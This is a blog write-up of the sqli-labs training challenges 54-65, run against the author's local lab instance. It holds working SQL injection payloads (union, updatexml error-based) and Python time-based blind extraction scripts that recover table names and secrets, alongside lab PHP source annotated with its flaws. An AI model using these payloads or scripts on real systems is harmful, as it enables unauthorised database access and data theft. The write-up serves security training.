Sqli-lab Challenges Write up


    Sqli-lab Less54-65 writeup

    Basic

    // MySQL reference used throughout the writeup. '//' is the author's comment marker; MySQL itself uses -- or # for comments.
    show databases;         //list the databases on the server

    use xxx; //switch to a database

    show tables; //list the tables of the current database

    desc xxx; //show the structure of a table

    select * from xxx; //select every row of a table

    select schema_name from information_schema.schemata; //enumerate database names

    select table_name from information_schema.tables where table_schema='xxx';//enumerate the tables of a database

    Select column_name from information_schema.columns where table_name='xxx';//enumerate the columns of a table

    left(a,b); //take the first b characters of a, counting from the left

    mid(column_name,start[,length]); //take length characters of column_name starting at position start; same as substr

    substr(string, start, length); //take length characters of string starting at position start; same as mid

    ascii(); //convert a character to its ASCII code

    ord(); //convert a character to its ASCII code, same as ascii()

    Challenges

    Less-54

    $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

    没什么过滤,直接上

    0' union select 1,group_concat(schema_name),2 from information_schema.schemata;%23

    得到

    Your Login name:information_schema,challenges,mysql,performance_schema,security
    Your Password:2

    爆破表

    0' union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23

    得到

    Your Login name:QGVTNCJQK6
    Your Password:2

    爆破列

    0' union select 1,group_concat(column_name),2 from information_schema.columns where table_name='QGVTNCJQK6';%23

    得到

    Your Login name:id,sessid,secret_9YQQ,tryy
    Your Password:2

    爆破内容

    0' union select id,secret_9YQQ,tryy from QGVTNCJQK6;%23

    得到

    Your Login name:UEGTp3YhAO1wSaVNixYIWwMl
    Your Password:3

    Less-55

    $sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";

    也是没什么过滤,直接上

    0) union select 1,group_concat(schema_name),2 from information_schema.schemata;%23
    Your Login name:information_schema,challenges,mysql,performance_schema,security

    0) union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
    Your Login name:HSTKPKBJZX

    0) union select 1,group_concat(column_name),2 from information_schema.columns where table_name='HSTKPKBJZX';%23
    Your Login name:id,sessid,secret_Y1KS,tryy

    0) union select id,secret_Y1KS,tryy from HSTKPKBJZX;%23
    Your Login name:BsZ12SElz8qNeK2rvFOTYpkb

    Less-56

    $sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
    0') union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
    Your Login name:70ULR981EI

    0') union select 1,group_concat(column_name),2 from information_schema.columns where table_name='70ULR981EI';%23
    Your Login name:id,sessid,secret_KPCG,tryy

    0') union select id,secret_KPCG,tryy from 70ULR981EI;%23
    Your Login name:t8Q1iKTajlerR65fY1P8Lu8I

    Less-57

    // Less-57 (lab source): the input is wrapped in double quotes by string concatenation. That is not
    // escaping -- nothing inside $id is sanitized -- so a double quote in the input still terminates the
    // literal. $id's origin is outside this snippet; the fix is a prepared statement, not more wrapping.
    $id= '"'.$id.'"';
    // Query DB to get the correct output
    $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";

    增加了"

    0" union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
    Your Login name:28YHZGI481

    0" union select 1,group_concat(column_name),2 from information_schema.columns where table_name='28YHZGI481';%23
    Your Login name:id,sessid,secret_152D,tryy

    0" union select id,secret_152D,tryy from 28YHZGI481;%23
    Your Login name:u1TfmRa1qunL2c4bGqZv4H6J

    Less-58

    // Less-58 (lab source): same unparameterized query as Less-54, but the query result is no longer
    // echoed. $id is assumed to be the request's id parameter; its assignment is outside this snippet.
    $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
    // mysql_* is the legacy ext/mysql API (removed in PHP 7); it offers no parameter binding, which is
    // part of why this string-building pattern persists in old code.
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font color= "#00FFFF">';
        // The row's id is only used as an index into two fixed arrays, so column values from the query
        // never reach the page directly. The arrays hold 13 entries; an id outside 0..12 would produce
        // a PHP undefined-offset notice.
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        // The raw MySQL error text is written into the HTTP response. That is the information leak the
        // writeup relies on; errors belong in a server-side log, with a generic message for the client.
        print_r(mysql_error());
        echo "</font>";
    }

    可以看到,查询结果被用作数组序号,输出被改了,但是mysql_error()被打印了,所以我们可以直接用报错注入

    0' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
    XPATH syntax error: '~HG2RC34XP0~'

    0' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='HG2RC34XP0'),0x7e),1);%23
    XPATH syntax error: '~id,sessid,secret_7IXP,tryy~'

    0' and updatexml(1,concat(0x7e,(select secret_7IXP from HG2RC34XP0),0x7e),1);%23
    XPATH syntax error: '~m20SLP9m0za56xuhE7s1awqR~'

    Less-59

    // Less-59 (lab source): query DB to get the correct output. $id is interpolated with no quotes and no
    // type check, so the value is parsed as SQL as-is. $id's origin is outside this snippet; the fix is a
    // prepared statement with $id bound as a parameter.
    $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
    // Legacy ext/mysql API (removed in PHP 7); no parameter binding available.
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font color= "#00FFFF">';
        // Only the row's id is used, as an index into two 13-entry arrays; query columns are never
        // echoed directly.
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        // Raw MySQL error text goes to the client; this is the channel error-based injection uses.
        // Log server-side, return a generic message.
        print_r(mysql_error());
        echo "</font>";
    }

    还是按照之前的用报错注入

    0 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
    XPATH syntax error: '~EANMX28TXI~'

    0 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='EANMX28TXI'),0x7e),1);%23
    XPATH syntax error: '~id,sessid,secret_Z6IM,tryy~'

    0 and updatexml(1,concat(0x7e,(select secret_Z6IM from EANMX28TXI),0x7e),1);%23
    XPATH syntax error: '~tEwpAjainXQeyDLGeSG1nuok~'

    Less-60

    // Less-60 (lab source): the input is wrapped in ("...") by concatenation. Wrapping is not escaping;
    // the value itself is never sanitized, so the query below is still built from raw input. $id's
    // origin is outside this snippet; the fix is a prepared statement with $id bound as a parameter.
    $id = '("'.$id.'")';
    // Query DB to get the correct output
    $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
    // Legacy ext/mysql API (removed in PHP 7); no parameter binding available.
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font color= "#00FFFF">';
        // Only the row's id is used, as an index into two 13-entry arrays; query columns are never
        // echoed directly.
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        // Raw MySQL error text goes to the client; this is the channel error-based injection uses.
        // Log server-side, return a generic message.
        print_r(mysql_error());
        echo "</font>";
    }

    直接加上")绕过,依然可以用报错注入

    0") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
    XPATH syntax error: '~5OJBK8U9XQ~'

    0") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='5OJBK8U9XQ'),0x7e),1);%23
    XPATH syntax error: '~id,sessid,secret_8GHX,tryy~'

    0") and updatexml(1,concat(0x7e,(select secret_8GHX from 5OJBK8U9XQ),0x7e),1);%23
    XPATH syntax error: '~Ij8p6anZKPghpsC4S5Ti9mgi~'

    Less-61

    // Less-61 (lab source): query DB to get the correct output. $id sits inside (('...')) but is still
    // interpolated raw; extra delimiters around an unsanitized value do not reduce the risk. $id's origin
    // is outside this snippet; the fix is a prepared statement with $id bound as a parameter.
    $sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
    // Legacy ext/mysql API (removed in PHP 7); no parameter binding available.
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font color= "#00FFFF">';
        // Only the row's id is used, as an index into two 13-entry arrays; query columns are never
        // echoed directly.
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        // Raw MySQL error text goes to the client; this is the channel error-based injection uses.
        // Log server-side, return a generic message.
        print_r(mysql_error());
        echo "</font>";
    }

    直接加上'))绕过,依然可以用报错注入

    0')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
    XPATH syntax error: '~MP94IBBMTL~'

    0')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='MP94IBBMTL'),0x7e),1);%23
    XPATH syntax error: '~id,sessid,secret_QN8H,tryy~'

    0')) and updatexml(1,concat(0x7e,(select secret_QN8H from MP94IBBMTL),0x7e),1);%23
    XPATH syntax error: '~CieVXfic1dl9FuqHdChc2we3~'

    Less-62

    // Less-62 (lab source): query DB to get the correct output. The query is still built from the raw
    // $id (origin outside this snippet); the only change from Less-56 is that error text is no longer
    // echoed. Suppressing errors removes one feedback channel but does not fix the injection; only a
    // prepared statement with $id bound as a parameter does.
    $sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
    // Legacy ext/mysql API (removed in PHP 7); no parameter binding available.
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font color= "#00FFFF">';
        // Only the row's id is used, as an index into two 13-entry arrays; query columns are never
        // echoed directly.
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        // Error output disabled: the failure branch now renders an empty block, so response content no
        // longer distinguishes a failed query; response timing remains observable, as the writeup shows.
        // print_r(mysql_error());
        echo "</font>";
    }

    因为注释了print_r(mysql_error()),无法用报错注入。因为还有尝试次数,只能用延时注入

    写了一下脚本,写得比较渣

    # encoding: utf-8
    # Time-based blind extraction script for the author's local sqli-labs Less-62 instance.
    # The lab no longer echoes mysql_error(), so the script infers one character per request
    # from whether the response outlives the client timeout. The response body is never read.
    # Detection note: each recovered character costs up to 62 GET requests whose id parameter
    # contains sleep(5), exactly one of which takes ~5 s; that pattern is conspicuous in access
    # logs and is slowed or stopped by a request-rate or per-query time limit.
    import requests
    import re  # NOTE(review): imported but never used in this script

    index_url = "http://localhost:8081/Less-62/index.php?id="

    header = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
    }
    # Session cookies copied from the author's browser for their own lab instance.
    cookie = {
        'challenge':'7b4184899f8b788841fb3eaf29177fdc',
        'PHPSESSID':'a64htnnoo54e99q0005mareng7'
    }

    flag = ''  # accumulates the recovered characters, one per outer iteration


    # Earlier stages (table name, then column name) were run once and left commented out;
    # their results are hard-coded into the final stage's query below.
    # for i in range(1,11):
    # print(i)
    # for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
    # j = ord(j)
    # # payload = "0') or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    # url = index_url + payload
    # try:
    # r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    # # print(r.text)
    # except:
    # flag += chr(j)
    # print(flag)
    # break

    # flag = 'secret_'
    # for i in range(8,12):
    # print(i)
    # for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
    # j = ord(j)
    # payload = "0') or if((ascii(substr((select column_name from information_schema.columns where table_name='WMBY8Y9EUL' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
    # url = index_url + payload
    # try:
    # r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
    # # print(r.text)
    # except:
    # flag += chr(j)
    # print(flag)
    # break
    #secret_WPTM

    # Final stage: the 24-character secret, probed position by position over a mixed-case alphabet.
    for i in range(1,25):
        print(i)
        for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
            j = ord(j)  # j is rebound from the character to its code point; chr(j) below restores it
            payload = "0') or if((ascii(substr((select secret_WPTM from WMBY8Y9EUL),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
            url = index_url + payload
            try:
                # The 4.5 s client timeout is deliberately shorter than the injected sleep(5).
                r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
                # print(r.text)
            except:
                # A timeout is read as "this character matched".
                # NOTE(review): the bare except also catches connection errors and any other failure,
                # so a non-timeout exception is recorded as a match as well.
                flag += chr(j)
                print(flag)
                break
    #mtvo4Z0u4wqd0nLRwxnydled

    Less-63

    // Less-63 (lab source): same raw interpolation of $id (origin outside this snippet) as Less-54, now
    // with error output disabled. Hiding errors does not fix the injection; only a prepared statement
    // with $id bound as a parameter does.
    $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
    // Legacy ext/mysql API (removed in PHP 7); no parameter binding available.
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font color= "#00FFFF">';
        // Only the row's id is used, as an index into two 13-entry arrays; query columns are never
        // echoed directly.
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        // Error output disabled: a failed query renders an empty block, so only response timing is
        // left as an observable signal.
        // print_r(mysql_error());
        echo "</font>";
    }
    # encoding: utf-8
    # Time-based blind extraction script for the author's local sqli-labs Less-63 instance, in three
    # stages: table name -> secret column name -> secret value. The lab returns no error text, so the
    # only oracle is whether a request outlives the client timeout; response bodies are never read.
    # Detection note: each recovered character costs up to 36-62 GET requests whose id parameter
    # contains sleep(5), exactly one of which takes ~5 s; that pattern is conspicuous in access logs
    # and is slowed or stopped by a request-rate or per-query time limit.
    import requests
    import re  # NOTE(review): imported but never used in this script

    index_url = "http://localhost:8081/Less-63/index.php?id="

    header = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
    }
    # Session cookies copied from the author's browser for their own lab instance.
    cookie = {
        'challenge':'31a6b5568bbb9c350c1b296d9086acf0',
        'PHPSESSID':'a64htnnoo54e99q0005mareng7'
    }

    flag = ''  # working buffer for whichever name is currently being recovered
    table = ''
    column = ''

    # Stage 1: the table name, 10 positions over an upper-case alphanumeric alphabet.
    for i in range(1,11):
        print(i)
        for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
            j = ord(j)  # j is rebound from the character to its code point; chr(j) below restores it
            payload = "0' or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
            url = index_url + payload
            try:
                # The 4.5 s client timeout is deliberately shorter than the injected sleep(5).
                r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            except:
                # A timeout is read as "this character matched".
                # NOTE(review): the bare except also catches connection errors and any other failure,
                # so a non-timeout exception is recorded as a match as well. If no candidate matches,
                # the position is silently skipped.
                flag += chr(j)
                print(flag)
                break

    table = flag
    print("################################# table is %s" % table)
    # Stage 2: the column name. Positions 1-7 are assumed to be the 'secret_' prefix seen in the
    # earlier levels, so only positions 8-11 are probed; 'limit 2,1' picks the third listed column.
    flag = 'secret_'
    for i in range(8,12):
        print(i)
        for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
            j = ord(j)
            payload = "0' or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
            url = index_url + payload
            try:
                r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
                # print(r.text)
            except:
                flag += chr(j)
                print(flag)
                break

    column = flag
    print("################################# column is %s" % column)
    flag = ''

    # Stage 3: the 24-character secret value, over a mixed-case alphabet.
    for i in range(1,25):
        print(i)
        for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
            j = ord(j)
            payload = "0' or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
            url = index_url + payload
            try:
                r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
                # print(r.text)
            except:
                flag += chr(j)
                print(flag)
                break
    print("################################# key is %s" % flag)

    Less-64

    // Less-64 (lab source): query DB to get the correct output. $id (origin outside this snippet) is
    // interpolated unquoted inside double parentheses, and error output is disabled. Neither the extra
    // parentheses nor the hidden errors fix the injection; a prepared statement with $id bound as a
    // parameter does.
    $sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
    // Legacy ext/mysql API (removed in PHP 7); no parameter binding available.
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font color= "#00FFFF">';
        // Only the row's id is used, as an index into two 13-entry arrays; query columns are never
        // echoed directly.
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        // Error output disabled: a failed query renders an empty block, so only response timing is
        // left as an observable signal.
        // print_r(mysql_error());
        echo "</font>";
    }
    # encoding: utf-8
    # Time-based blind extraction script for the author's local sqli-labs Less-64 instance; identical
    # in structure to the Less-63 script, differing only in the URL, cookies and the "0))" prefix that
    # closes the lab's double parentheses. Three stages: table name -> column name -> secret value.
    # The only oracle is whether a request outlives the client timeout; response bodies are never read.
    # Detection note: each recovered character costs up to 36-62 GET requests carrying sleep(5) in
    # the id parameter, exactly one of which takes ~5 s; easy to spot in access logs and slowed or
    # stopped by a request-rate or per-query time limit.
    import requests
    import re  # NOTE(review): imported but never used in this script

    index_url = "http://localhost:8081/Less-64/index.php?id="

    header = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
    }
    # Session cookies copied from the author's browser for their own lab instance.
    cookie = {
        'challenge':'6efa4aae76d29c330a3636356fa5386c',
        'PHPSESSID':'a64htnnoo54e99q0005mareng7'
    }

    flag = ''  # working buffer for whichever name is currently being recovered
    table = ''
    column = ''

    # Stage 1: the table name, 10 positions over an upper-case alphanumeric alphabet.
    for i in range(1,11):
        print(i)
        for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
            j = ord(j)  # j is rebound from the character to its code point; chr(j) below restores it
            payload = "0)) or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
            url = index_url + payload
            try:
                # The 4.5 s client timeout is deliberately shorter than the injected sleep(5).
                r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            except:
                # A timeout is read as "this character matched".
                # NOTE(review): the bare except also catches connection errors and any other failure,
                # so a non-timeout exception is recorded as a match as well.
                flag += chr(j)
                print(flag)
                break

    table = flag
    print("################################# table is %s" % table)
    # Stage 2: the column name. Positions 1-7 are assumed to be the 'secret_' prefix seen in the
    # earlier levels, so only positions 8-11 are probed; 'limit 2,1' picks the third listed column.
    flag = 'secret_'
    for i in range(8,12):
        print(i)
        for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
            j = ord(j)
            payload = "0)) or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
            url = index_url + payload
            try:
                r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
                # print(r.text)
            except:
                flag += chr(j)
                print(flag)
                break

    column = flag
    print("################################# column is %s" % column)
    flag = ''

    # Stage 3: the 24-character secret value, over a mixed-case alphabet.
    for i in range(1,25):
        print(i)
        for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
            j = ord(j)
            payload = "0)) or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
            url = index_url + payload
            try:
                r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
                # print(r.text)
            except:
                flag += chr(j)
                print(flag)
                break
    print("################################# key is %s" % flag)

    Less-65

    // Less-65 (lab source): the input is wrapped in double quotes by concatenation and then placed
    // inside parentheses. Wrapping is not escaping -- $id (origin outside this snippet) is never
    // sanitized -- and error output is disabled. Only a prepared statement with $id bound as a
    // parameter fixes the injection.
    $id = '"'.$id.'"';
    // Query DB to get the correct output
    $sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
    // Legacy ext/mysql API (removed in PHP 7); no parameter binding available.
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font color= "#00FFFF">';
        // Only the row's id is used, as an index into two 13-entry arrays; query columns are never
        // echoed directly.
        $unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
        $pass = array_reverse($unames);
        echo 'Your Login name : '. $unames[$row['id']];
        echo "<br>";
        echo 'Your Password : ' .$pass[$row['id']];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        // Error output disabled: a failed query renders an empty block, so only response timing is
        // left as an observable signal.
        // print_r(mysql_error());
        echo "</font>";
    }
    # encoding: utf-8
    # Time-based blind extraction script for the author's local sqli-labs Less-65 instance; identical
    # in structure to the Less-63 script, differing only in the URL, cookies and the 0\") prefix that
    # closes the lab's double-quote-plus-parenthesis wrapping. Three stages: table name -> column
    # name -> secret value. The only oracle is whether a request outlives the client timeout; response
    # bodies are never read.
    # Detection note: each recovered character costs up to 36-62 GET requests carrying sleep(5) in
    # the id parameter, exactly one of which takes ~5 s; easy to spot in access logs and slowed or
    # stopped by a request-rate or per-query time limit.
    import requests
    import re  # NOTE(review): imported but never used in this script

    index_url = "http://localhost:8081/Less-65/index.php?id="

    header = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
    }
    # Session cookies copied from the author's browser for their own lab instance.
    cookie = {
        'challenge':'caf415945acc41218462264d7e211f37',
        'PHPSESSID':'a64htnnoo54e99q0005mareng7'
    }

    flag = ''  # working buffer for whichever name is currently being recovered
    table = ''
    column = ''

    # Stage 1: the table name, 10 positions over an upper-case alphanumeric alphabet.
    for i in range(1,11):
        print(i)
        for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
            j = ord(j)  # j is rebound from the character to its code point; chr(j) below restores it
            payload = "0\") or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
            url = index_url + payload
            try:
                # The 4.5 s client timeout is deliberately shorter than the injected sleep(5).
                r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
            except:
                # A timeout is read as "this character matched".
                # NOTE(review): the bare except also catches connection errors and any other failure,
                # so a non-timeout exception is recorded as a match as well.
                flag += chr(j)
                print(flag)
                break

    table = flag
    print("################################# table is %s" % table)
    # Stage 2: the column name. Positions 1-7 are assumed to be the 'secret_' prefix seen in the
    # earlier levels, so only positions 8-11 are probed; 'limit 2,1' picks the third listed column.
    flag = 'secret_'
    for i in range(8,12):
        print(i)
        for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
            j = ord(j)
            payload = "0\") or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
            url = index_url + payload
            try:
                r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
                # print(r.text)
            except:
                flag += chr(j)
                print(flag)
                break

    column = flag
    print("################################# column is %s" % column)
    flag = ''

    # Stage 3: the 24-character secret value, over a mixed-case alphabet.
    for i in range(1,25):
        print(i)
        for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
            j = ord(j)
            payload = "0\") or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
            url = index_url + payload
            try:
                r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
                # print(r.text)
            except:
                flag += chr(j)
                print(flag)
                break
    print("################################# key is %s" % flag)

  • Article Author: Zeddy

    Article Link: https://blog.zeddyu.info/2019/03/04/Sqli-lab Challenges Write up/index.html

    Copyright Notice: With the exception of the special statement at the beginning of the article, all articles can be reprinted in accordance with the CC BY 4.0 agreement with the author's permission.
